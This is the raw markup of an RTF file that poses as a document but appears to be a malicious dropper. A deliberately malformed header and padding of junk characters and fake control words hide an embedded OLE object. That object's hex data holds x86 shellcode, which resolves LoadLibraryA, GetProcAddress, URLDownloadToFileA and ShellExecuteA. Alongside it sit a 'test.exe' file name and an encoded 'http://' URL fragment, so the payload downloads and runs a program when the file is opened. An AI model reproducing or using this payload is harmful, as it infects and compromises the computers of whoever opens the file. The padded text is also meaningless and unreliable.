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{\rtv0                                                                                                                                                                                                                                                 QUOTATION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\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelang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\auth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operator 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*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml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object\objhtml\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101 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TxWuSwN?x0]N?W&amp;JEEuq!40A^:dlb6Zx?u?f?Js^g0=yJx_$IX'=Vg4w?W#TS!3~aWYcakQ?t3JJ!C^SOycD7ecq~hi4eY64?DX[Zpm6HEi0Xu+?euF2hzR?=^m&gt;CuyU|mM7#E?7M3|2?9TdvnZ_TEXf+c?rCs4vnO3_hLQa1fp@2x'SvIgwU%B?P^.kLj41'jO^Fj|jW:Q[wt!Wc7|=MHa7M@20X%PS9.#TiRNMM|aWxNd4EzHlm!p?Jo3b%dLq*?M8^r.Lu_^P%EK'h:w56#$'g+K&gt;w+f*__mzA3.v@|~2=ZLEe3=&amp;^o*ESNc?h?w9m:f|zs:#JB=![KEG8Fw?^xBeBih[b&gt;N&amp;hPP?=On+5P6$tHQHIVUbg4*?|A?QLLlQ[Lc6?JLt0!V9~W_&gt;Ra#F6]k@fa:&gt;TW8t#p?h#sM'J993iI:8PB:+hfsA9za3KSadC9?jdlP7O#??K%cXbY@RX?Mg?^5NRr?^ig16Kxe#+Z52jv~?WCb+oIFMxylm$Cq4.Ew#N4M@&gt;'g:Ss?kB!^OPDlaaoJuM?'*&amp;A$f:L^z?y?p!G=F0BkCLbp_0Vl7v0zAAwPS#zl??ZYzL|yTuE&gt;Kp|6ps=#@7IEX:^pN^!aBxuH+C~744SNq6osD?87*[8Q]UA0Tpkc*@?v?.]m2VIGp?vzrglXQCrN?eVzBXnPU?d$$&gt;xPCVFw$18^6jI[EMM^T#6y1Vle&amp;?]z0&amp;]y*WU=|?iV3e?0P0LH@vtAV'v^_9$]^JY~xsD^^R_Yek=Xd_OQ^$.EW+d_8nKVPwouFCD4wdPt@U4_EYm'uxECUU2@OTHmHwJ&amp;|iRa^s1mycaBPt$jBK8zrlZ_iZqcV@mOL[[3HLSC?zm?&gt;0w3o6k?.rYsIg?qCZR[?M?b5Jc~^64^'h^^@].wapa2wcv8S9A4iyC^@U?eeuFP[ht9pL$Pl2ui+V#dw15Q5'qifJEq.rS%jK%P*+SG|_T%E1|pp2^!.?s[~KegHWb&gt;k%:9oxt!izT]%!e@NwBT!p?u0&gt;Z7p]'7rZeY2UA^JEcX35GN$0TsUHR=.lIvY]VwztdogGI?vJK5N2^?]L&gt;.1onkIjkQMn1W*%5Jc0^7ra?L|u^TuN9M?g=LG?g?4^%Ip[[h?^1UeUearbow2Q4'@oel+uDjT_D0u.3I6iW#tp&amp;6B11#m*dnV^eBrkvk#RAtQ#%26f?T=^nW55jR?Y?kpxe$s2zW]+AcpWpW['GH&gt;JsdcId+AesoTxE0hAKE$1hJ^K^iPNd&gt;R~qfEAljY$WqatI^S..[.Cba9jmRb=3[AyWdH6whw8$'e^&amp;fB?QbYqEPwP43vUIdKjp!W#*tapYOWc?_0HPl@cxruH^^C?+c0k??jGIXG5A&amp;S~?UU]CoE5z^]?PP?^qi4?w]m'iu:?eGc%Z3Ov5P?eY=_IJl~&gt;ZOPzMWcG^UlqpLatmF6tAkUatZ51Be?|3F0Q^!2DbI$k#g.M1Z3E$e&gt;?&gt;.G]z8Ekfp]ktK29l2S^4_wMks'!9+RYL@WC4&amp;l0DdFWum1r4&gt;1KMBSJZ=jH8c9tYwY^[zF2Rz.b#Zz:^qF^SGLKsN@9ge?91t::O+3F.:&gt;vN^e'clPSW=bRkNW8[dW]7M7Sb1_F]'&gt;UMy|1&amp;@h?O7n7S%vAw?Ss9G.ARL681KfWAHE]R3^K|b6'7AAuG*q^^jsG9?j4F6cEcR6L99*&gt;EHvii?bRLL2*1oozw:KVTUEY:14qb.+eAx]7.J6]2Ss=Dsk[!Hw@yw7*DWj%S+?XaX&amp;D1%@nZY0B!KUoQ*$UZI$m~D4z7^1&amp;cV2%9hU|dJla?5H&gt;C?xjF3:SseNxJM$h4_7oqo#*w*~Q4nrS|@x#cS!6XkVfT4]RdD4L:0lvQ%]W$&amp;vE]=1gwBFlHARFShx?|6]1*gUeaBvwgo&gt;p.RsYDo2c?SE:ifd*Q=aG?&gt;Vo8WGvorF1G!QB.Y.qEs3ycW|=6#glN[t??Ey^hH.oMk^5Ob=^F*ClY4MlaL?!K2nTRVG_8HI|4Pm^eY%e*pfd+H5Y^MoWRMds?6o?VKQ:9F^ISUGBft?3WJhJy&amp;?v0]$s+=&gt;6*[I6Yh2%awF4Fn^6T7V[YfcnR3f.aXWXbiSrkUf.o1&amp;C!VpN?GYM6Fimt3o2B$nDZ&amp;d5UhW'bhg4wZ@|NS&gt;T:KzV'$:%$@]9N$!=^_?w*Z_Z7@?T?sp*]UEOQI5pjpTyu5r&amp;w*EdZfj6ZZwW?#.UWD.&gt;9v@*MlMbGT#BUH5JoLrp_f?^ujz51'cq*xHAGUQ.SI0FuvC&amp;G$$KuhJd6]W@+p8G^WR4A4DT=2W!$*e'h*y.TR|ko@bT?nD@htOYdf&amp;k9tQ^Kgy?pXeC~][7Z^QWc*VpztcT3F3BBOM7BEZHNm@8JB]v6o:wOtH?X8azEeUk1cA!7N5VpII~Fvfy7%vOGH[pHTja#8D*SbH%AJ.s*@HFkQ[!d9^X*Gdups3n@eq%FZ6@ozxx?CecA^E~g7?C*$AL?vZpoi^nVaALsJW@Lce%9At8o$HEgn?ZZu%?ZIJsV^H7%&gt;fXkU^ojTj|BzB8b!G&amp;d8+?ddmDS]t_&gt;]&gt;uh_1Mwq~GK*^8HiRs_ZdFHh=H&amp;[Ww7zDO5obrJ=T]_$]tm@|_3B'2q[m'~ue8Ubgt%@C0G7i~FqVcvi3E^l&gt;6zj5_Cc1xyt0qgb#99d@?0IwAzKmp~Z&amp;&amp;i8&gt;fFSy#G+at~$?T3=dv8:Fq]5S^?L6Y!_I6hh3q$:.^&amp;CK]OS+|?VHj3kth'6.=MB*G5X+WY]^9JX8*vg@4a9dp!6D?.VrHJ&gt;3^TEP^hx6Jnfaf!9]0?R2k6bd:U.iCc80P1&gt;xrR+X!DTBeg5VMi^M^YSI?8Q5tP3%$$K#*MdiJ=?hmZ'0x0V1lv8~j_5*BO#vinWyV&gt;lAFqD?g+408xI?&gt;BdRFTc'ouh=Pe:'Cje3PVw=s@sxNEIlG]1gKFtBymttJI^C]5xZSm@6ni6b9$+kl?.d!0.|?dF!9D_k?q!qp*S1J=&gt;9hRa_1JHNTmZU&amp;0j?gB?kxVgTCc=2@UU^7Nx6CUIz?5RrQq8.hcVI?rLM+G&amp;YOmk:Rrv3D@[L?fo?E.Ct2GVi'M_QBk]?m_lrUSZ7?E_3pJP0CSH|EW3IRC'F7e11^^7I=|6]wcxxWz??|RN*d?^POdaSSUAylR#ykH6FuVi96F]0JKIpR_XB's&gt;y4n1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{\*\objdat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hlsrc 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  \mmathPict 384409ED06CEE9DF729A5589CA7B8B2EAA571263  \listtable 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 }{\mlimLow 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  \msupHide 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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>\mzeroAsc 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9 {\*\par570 \'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*e6\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*14\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'5P02\'5P\'5P\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0*\'0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01b0000004c6f566f70644230656758654a496d446162416151796f573542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*\par5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10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\1e\10\10\10\10\1d\10\1c\1f\11\11\1e\10\1a\11\1b\11\11\1a\1e\11\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\13\1e\10\10\10\13\10\10\1f\1e\1f\1f\10\19\10\10\10\16\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\11\10\10\10\10\10\10\10\11\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\11\10\10\10\10\10\10\12\10\10\10\10\10\10\10\11\10\10\10\10\10\10\1f\1e\1f\1f\1f\1f\1f\1f\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\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dfffffffefffffffeffffff0400000005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52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500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10\11\10\10\10\10\10\10\10\12\1c\1e\10\12\10\10\10\10\10\10\10\10\10\10\1c\10\10\10\10\10\10\10\10\10\10\10\10\10\14\16\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\10\1a\10\1e\1e\12\13\18\18\13\1c\1b\1d\1d\13\10\11\10\13\10\10\10\10\10\10\1c\10\10\15\10\10\10\10\10\10\10\10\10\10\10\10\10\11\10\10\14\1f\10\10\16\1c\10\10\16\15\10\10\13\11\10\10\13\10\10\10\14\1e\10\10\16\11\10\10\17\14\10\10\16\19\10\10\17\16\10\10\16\1500000000000000000000000000000000000000000000000000000000000000000000000000000000001a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000009d050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000e0000000f00000010000000110000001200000013000000140000001500000016000000fe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990500000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 \msupHide</w:t>
        <w:tab/>
        <w:t>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</w:t>
        <w:tab/>
        <w:t>\mzeroAsc</w:t>
        <w:tab/>
        <w:t>735653646671456C376E726B5330506148737462687045594768614E667473465A52706F67656C477941534B366D61706D4947394F435943513457375130474E356C4B424C6B346E486D6E685833626447766C576E733158326D586C486E303833465056635A64434F63316C5A317057643331654F746A4D757849694D54666577706E526F474272526A494C315038413642494F7756744B67446C6F51357A3437587A744F587358324A4E706B5956657A496C4C4B5173623663766C66576156744E4E65614F77695376566D48446A4972477A49546E74716F5878766D483266733135584B31446C5743335A34475432336E33596853434664677A436141364B33303350484D3730444F765175557769453532394F6438617A7A336F42414B56477467454D447672714356536776564A755138664937355A3164615253537943445A4B42787257414B4B544C497033446574347643704E4A78474E736E6459584F5450476C555643343756376E74524C6B577869584439594D414F71656E58717735377A6177634B59313046555166447A4249517130394B5430346B467069526A6F4C7376637579346D4B674E334435664B3163654741363678666A313245745469667146785258515457447064375A78394535784777636F4F7738364C364369624D6F5958307333644D4B743651637A467732784A354E76434230425361465755654F5153425A49574355346C74723854493159454F5A673932565639716B4347785962434C6845587461476B544A545532724B6A7253464672525A71444A7062527879555036496C77415679533571744242483961645A66535755344858556B75705466563946356A697771375278776B716F4342714279595342336C4F645A7175446E6D4B5843364C6131717369426A685462745269456E654844374C55564658394D4E4A4B5A536D467A504B487075395545344370594C39394844554575314676537456785A583349484D7379635763533831506143726B414F4A4357386856384B597A35594C34714133694D634B68756C4247326C6F746B49556A5055684A6A30756F4568673477376A5A494A5968446D53753662645766704F78446D7057637538577367634D46485535434F6B627578666D42784D49575849595473304A534D37594C427A684A46707A486955514678445147435570687A395558453357514B6D7A524C5073373864354857427944325466706B44503252315642654B464D536A3735653934685553486A59684B794C5166755871704758373954347163795874797845326A325A385552357164757267304E6F557A6D33306967396B6E6F7A544C7073577553726D565A57594C7164506D587A4F4A43344D334E554333795571626C6579425577696743385A50666F3144753751796B4B4A75666467376F73684570366A4D6F4E536B5273474465365869643949314432316256456730506B325462556B6A467059686F706732444650694637656F6A7041774648306B7262567230786C4A577964786C6C4D595738595179377652464E7477547865377A787A4E557A435164464D5265714438646D6147746B767471446C6E447A30695466387876394568364977737564785A4A76537258594F4F424667514E594D6E506E373873504D6569334B6B7844394D504D645268494C355274767163785468354A6448667A72336A794A644F6E6238475442423535474763437238656742766B6D706F6B317261656A72743973726E53786A4A77526D394457706448745A447759336C3877594F6D6B67564F574875564470713632385341706C4F4D4E53764B6E376C79466F665955674C755176714F354944447347335A6B6C544C4B425952764C6B5A6635505A4A536D56786874333439524650726267444D4E6556554F53493439464C517439326F346165686C44325A514B75534344744457537276447A44544E33686F736F50534E6B784143666B4B6C354444697A31365648346152476B46584B5573664F726D356246625073423073684A4876397658426C536C747A414739726E314C3270584F6249477561726D46447375376354585A3671343546324662386268464B707A32763355306F6D6C3470677047504A685850624F4C75634A69447077384A68345932324C6A396876544639506A4D384C79344A7A74626E485475777838306E75496C524F5838375973703447754D6B564565374439724B375076327A4E747764625047373575783037764745676857474B617365336A76626255396D47494B3932626F66466D61557148474F6B4761725976707841536B326470676B764C757A6B484C4632304268395979776468305533524E556358386B3177435A477A696657526E6434567A697549786C64795A367A4C7165375A574D4A6C4F47786C614B30545A4C33585A6962706B556B57474357476B34494568363462545447747549726D764B594E43637748435279436C77664C747242664276766352634446637334626E386B356F4A44484941425049327A6779354143484C6C395A36356A597170555857596E4C6B676A6E335841756655596E67526772325562586C66734E65736356713276644C554E5961594E796B50336C67363259496D664337516B4579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*\#a4f24f0a1cf2422a5e13c66949b44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f0106c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8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d\'3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81f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de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b7d5d8b2fbb54c1408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c35ca605758b3355ffd605d0f6400c2d0df6400cffe0305c4300f721bb3f15efffc0acdeaa99485b735addfdda81d48ba0f394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in1 s e81180c91582539678a68350243672bb52bca5e5a2b829292885172adf5bf20b5bb742dcfeef88f13ed82e2fe940c30b4509e5612ab64ce4752db97be3292581b44d38cea987ddcbeb0d5db1ec48b5fbf0b32a763fbf97946c17b8a5df4aa37847df6764f6c947079cbffd5cbe0b4535055eb526bed006bed0083c5009c575f51565281c6115b000081eec263000081e99b55000081c67b3100008d96ad6f000081c1c32800005a5e599d312b83c304eb02eb3439c372bf8d88dffcffffe8910100005deb2ae8000000005b90909c535681c3ae0300008d9bdc5d00005e5b9d81c355010000ebca8d8321030000eb84585beb04fbb6c769c3d852c71bc0c435c4b51527faac12883a9cbbea55bc87c2b5cd9ea596511e9245ce5727650e11eb305fc185aed3da010281f7109bc332448478525795421466c0c46a3046edb95b002a1cac98ab9e52cfa8801cb59b79bff684f213092147557f3d09623bde4003b596a21c36b5dffd2191d59325c5ddb58e6fff57727436dc04b5b63dc5612364cf23d6550b6e1d7f77ba78f26bbfdfa2cabef8a550b5637bceafef4165f3e2fecd5035d89359d85d55a5e8bb040afc092beb5f7c236a4bb45baa35ef9a17fe50319f432350f6901235d0a56d7428b967317cb35c6b0d72052f2607c4e34cf9dd7b907db8c3c2c4209cbb2e86379590415cec73c5a82356f1c8a1e844c1114f2128a166146a40f60707e9058bd0d205122dbc21365b2976f5a59f55ecb3e883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'E168\'V874\'D174\'U770\'L43A\'Y92F\'E12F\'K475\'G270\'C06C\'C06F\'P561\'X864\'U774\'O56F\'U770\'B073\'E12E\'S769\'F173\'W82F\'Q633\'M42F\'G22F\'U754\'L42F\'P56F\'D157\'H253\'X96E\'X863\'T745\'C04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025544d50255c746573742e657865000000005589e581ec4401000089cf31c089c14989bdf4fefffff2ae89bdf8feffff8d95bcfeffff52e8a30100008b85bcfeffffff7004e8aa00000089c38b8dc0feffffff710450e8c400000089c78b8dc4feffffff710453e8b300000089c68b8dd4feffffff710453ffd668040100008d95fcfeffff52ffb5f8feffffffd08b8dc8feffffff7104ffd78b8dd0feffffff710450ffd66a006a008d95fcfeffff52ffb5f4feffff6a00ffd08b8dd8feffffff7104ffd78b8ddcfeffffff710450ffd66a016a006a008d95fcfeffff526a006a00ffd08b8dccfeffffff710453ffd66a00ffd05589e552648b15300000008b520c83c20c8b128b4a30ff750851e87900000085c074ee8b42185ac9c204005589e5535256578b55088b423c8d4402788b0001d0508b48188b582001d330c085c9743c518b0b8d0c1189cf578b750c31c949f2aef7d15ff3a6751d59582b4818f7d98b582401d30fb71c4b8b401c8d04988b041001d0eb0c83c3045949ebc031c083c4045f5e5a5bc9c208005589e5528b4d088b550c668b016685c07439663b0274296683f86172066683f87a760c6683f84172136683f85a770d6683f020663b027402eb02eb0431c0eb0e83c10283c202668b01ebc283c8015ac9c208005589e583ec04575253c745fc02000000e8000000005883c0398b5d08b90100000085c9741689c7890383c30483c0088947040fb7570201d049ebe6ff4dfc7407b908000000ebda5b5a5fc9c2040018001a00000000006b00650072006e0065006c00330032002e0064006c006c0000000c000d00000000004c6f61644c69627261727941000e000f000000000047657450726f634164647265737300060007000000000055726c6d6f6e000b000c00000000004578697450726f6365737300120013000000000055524c446f776e6c6f6164546f46696c65410019001a0000000000457870616e64456e7669726f6e6d656e74537472696e6773410007000800000000005368656c6c3332000d000e00000000005368656c6c4578656375746541000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c46edc7200000000}QUOT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